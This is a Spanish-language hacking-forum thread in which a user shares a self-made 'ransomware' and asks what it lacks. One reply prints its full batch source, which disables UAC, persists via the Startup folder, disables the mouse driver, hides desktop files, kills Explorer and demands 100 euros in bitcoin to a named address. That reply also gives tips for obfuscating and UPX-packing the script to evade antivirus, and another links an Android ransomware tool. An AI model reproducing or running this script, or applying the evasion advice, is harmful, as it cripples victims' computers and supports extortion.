elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  He creado un Ransomware pero creo que me flata algo
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: He creado un Ransomware pero creo que me flata algo  (Leído 13,276 veces)
Tirenex

Desconectado Desconectado

Mensajes: 46


Los virus siempre se inyectan en Antivirus


Ver Perfil
He creado un Ransomware pero creo que me flata algo
« en: 16 Octubre 2021, 18:08 pm »

Les dejo el link para que prueben qué le falta, ya que yo lo tengo probado y no sé al 100% si funcionará

http://www.mediafire.com/folder/hvhw,gq5xoa2e2jdctdo/shared
« Última modificación: 17 Octubre 2021, 13:01 pm por Tirenex » En línea

Xyzed


Desconectado Desconectado

Mensajes: 306



Ver Perfil
Re: He creado un Ransomware pero creo que me flata algo
« Respuesta #1 en: 16 Octubre 2021, 21:05 pm »

Hola.

Dale, ahí ejecuto el ransomware y te cuento que tal... 


:silbar:
En línea

...
Panic0

Desconectado Desconectado

Mensajes: 218



Ver Perfil
Re: He creado un Ransomware pero creo que me flata algo
« Respuesta #2 en: 16 Octubre 2021, 23:58 pm »

Les dejo el link para que prueben qué le falta, ya que yo lo tengo probado y no sé al 100% si funcionará

http://www.mediafire.com/folder/hvh44yd4u0uw8hw,gq5xoa2e2jdctdo/shared

Lo que le falta es que mediafire no lo detecté como virus... Ya hablando enserio, no esperes publicar un malware y que la gente lo vaya a abrir en un foro de hackers.
En línea

Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
**Aincrad**


Desconectado Desconectado

Mensajes: 668



Ver Perfil WWW
Re: He creado un Ransomware pero creo que me flata algo
« Respuesta #3 en: 17 Octubre 2021, 03:00 am »

Bueno primero que todo , Batch , enserio ?   :silbar:

Esto no cifra archivos, por lo tanto ni lo consideraría un ransomware.

Segundo, Al menos Ofúscalo, te recomiendo mi herramienta : https://toolslib.net/downloads/viewdownload/631-batch-ide/

Por ejemplo convierte el .bat a .js y después a .hta, luego lo empaquetas con upx y con eso seguro bajas el ratio de detecciones.

Ransomware.bat  :P

Código
  1. o off
  2. REG ADD HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  3. copy Ransomware.bat "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
  4. @Echo off
  5. set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" /f
  6. reg delete %key%
  7. reg add %key% /v Start /t REG_DWORD /d 4
  8. Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeCaption" /t REG_SZ /d "TE DIJE QUE NO APAGARAS EL PC" /f
  9. Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeText" /t REG_SZ /d "AHORA TE HE ROBADO EL MOUSE [PULSA BARRA ESPACIADORA O INTRO PARA CONTINUAR]" /f
  10. @echo off
  11. ATTRIB +H +S "C:\Users\%USERNAME%\Desktop\*" /S /D
  12. echo on
  13. color 0A
  14. @echo off
  15. title RANSOMWARE
  16. taskkill /f /im explorer.exe
  17. :bucle
  18. cls    
  19. echo =================================================================================        
  20. echo           LEE CON ATENCION
  21. echo       SI QUIERE RECUPERAR LA CUENTA!
  22. echo =================================================================================
  23. echo  - No reiniciar este PC!.
  24. echo  - Al reiniciar se eliminara los datos del disco duro!.
  25. echo  - Si usted cierra esta ventana no podra recuperar el PC!.
  26. echo  - ENVIAR 100 Euros A esta direccion de BTC "35sP8MrpjWX7FHhy8wdv1hcSjMBokcQLRh"
  27. echo   SI QUIERE OBTENER LA CLAVE!.
  28. echo =================================================================================
  29. echo  - Le daremos la clave al recibir el dinero
  30. echo =================================================================================
  31. set /p pass= Escriba aqui el password:
  32. if %pass%==BvMIb2OBLM4l8RUFCpn0i3C (goto passcorrecto) ELSE (goto bucle)
  33. :passcorrecto
  34. ATTRIB -H -S "C:\Users\%USERNAME%\Desktop\*" /S /D
  35. cls
  36. @echo off
  37. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "ImagePath" /t REG_EXPAND_SZ /d "\SystemRoot\System32\drivers\mouclass.sys" /f
  38. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Type" /t REG_DWORD /d "1" /f
  39. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Start" /t REG_DWORD /d "3" /f
  40. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "ErrorControl" /t REG_DWORD /d "1" /f
  41. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "DisplayName" /t REG_SZ /d "@msmouse.inf,%%mouclass.SvcDesc%%;Controlador de clase de mouse" /f
  42. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Owners" /t REG_MULTI_SZ /d "oem7.inf\0oem6.inf\0termmou.inf\0msmouse.inf" /f
  43. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Group" /t REG_SZ /d "" /f
  44. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "0" /t REG_SZ /d "ACPI\VMW0003\4&1bd7f811&0" /f
  45. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "Count" /t REG_DWORD /d "3" /f
  46. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "NextInstance" /t REG_DWORD /d "3" /f
  47. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "1" /t REG_SZ /d "HID\VID_0E0F&PID_0003&MI_00\8&367bfb7c&0&0000" /f
  48. Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "2" /t REG_SZ /d "HID\VID_0E0F&PID_0003&MI_01\8&12a4bdba&0&0000" /f
  49. Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeCaption" /t REG_SZ /d "" /f
  50. Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeText" /t REG_SZ /d "" /f
  51. cd "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
  52. del Ransomware.bat
  53. cls
  54. echo Felicidades! La clave es correcta.
  55. echo    LEA ESTO!!!
  56. echo ========================================================
  57. echo Para volver a tener el mouse operativo, reinicie su pc
  58. echo ========================================================
  59. start explorer.exe
  60. start explorer.exe
  61. pause>nul
  62. pause>nul
  63. exit


En línea



Tirenex

Desconectado Desconectado

Mensajes: 46


Los virus siempre se inyectan en Antivirus


Ver Perfil
Re: He creado un Ransomware pero creo que me flata algo
« Respuesta #4 en: 17 Octubre 2021, 13:03 pm »

Amigo, te recomiendo que elimines o modifiques el Ransomware para que otra persona no lo copie y haga el mal, por favor sé bueno
En línea

**Aincrad**


Desconectado Desconectado

Mensajes: 668



Ver Perfil WWW
Re: He creado un Ransomware pero creo que me flata algo
« Respuesta #5 en: 17 Octubre 2021, 17:53 pm »

Nel, si querías sugerencias de que faltaba, debiste Poner el código fuente en la sección de scripts, No publicar un .exe y pretender que lo ejecutemos así nomas.

Por eso no quitare la source. además por que quitaría un simple batch que lo que hace es ocultar los archivos del escritorio y agregarse al inicio. quien querría usarlo ?

en pocas palabras tejo...

En línea



el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.580


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: He creado un Ransomware pero creo que me flata algo
« Respuesta #6 en: 18 Octubre 2021, 13:34 pm »

SARA - Simple Android Ransomware Attack
https://github.com/termuxhackers-id/SARA

En línea

DebianWizzard

Desconectado Desconectado

Mensajes: 17


la vida es perfecta hasta que abres los ojos


Ver Perfil
Re: He creado un Ransomware pero creo que me flata algo
« Respuesta #7 en: 7 Julio 2022, 05:10 am »

Lo que le falta es que mediafire no lo detecté como virus... Ya hablando enserio, no esperes publicar un malware y que la gente lo vaya a abrir en un foro de hackers.
NECROBUMP MOMENT

Oye, ¿no se supone que existen maquinas virtuales?
En línea

btw i use Arch
Infernoid

Desconectado Desconectado

Mensajes: 18

Soy un simple Programador!


Ver Perfil WWW
Re: He creado un Ransomware pero creo que me flata algo
« Respuesta #8 en: 12 Julio 2022, 01:33 am »

Está bien hecho si dejamos de lado que esta en batch, cumple plenamente con el objetivo del ransomware. :huh:
En línea

En mi codigo tu eres el ";" que me falta.
Trollwer

Desconectado Desconectado

Mensajes: 123


C:\Users\%Username%\Desktop


Ver Perfil
Re: He creado un Ransomware pero creo que me flata algo
« Respuesta #9 en: 22 Julio 2022, 10:53 am »

Lo estas haciendo con fines educativos?
La dirección de BTC existe, y no tiene nada por el momento:
https://www.blockchain.com/btc/address/35sP8MrpjWX7FHhy8wdv1hcSjMBokcQLRh
Espero que no lo hagas con otros fines... :rolleyes: :rolleyes: :rolleyes:
En línea

▂ ▃ ▁ ▁ ▅ ▃ ▅ ▅ ▄ ▅ ▇▇ ▅ █ ▅ ▇ ▂ ▃ ▁ ▁ ▅ ▃ ▅ ▅ ▄ ▅ ▇▇ ▅ █ ▅ ▇ ▂ ▃ ▁ ▁ ▅ ▃ ▅ ▅ ▄ ▅ ▇▇ ▅ █ ▅ ▇ ▂ ▃ ▁ ▁ ▅ ▃ ▅ ▅ ▄▇ ▅ █ ▅ ▇ ▂ ▃ ▁ ▁ ▅ ▃ ▅ ▅ ▄ ▅ ▇▇ ▅ █ ▅ ▇ ▂ ▃ ▁ ▁ ▅ ▃ ▅ ▅ ▄ ▅ ▇▇ ▅ █ ▅ ▇ ▂
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines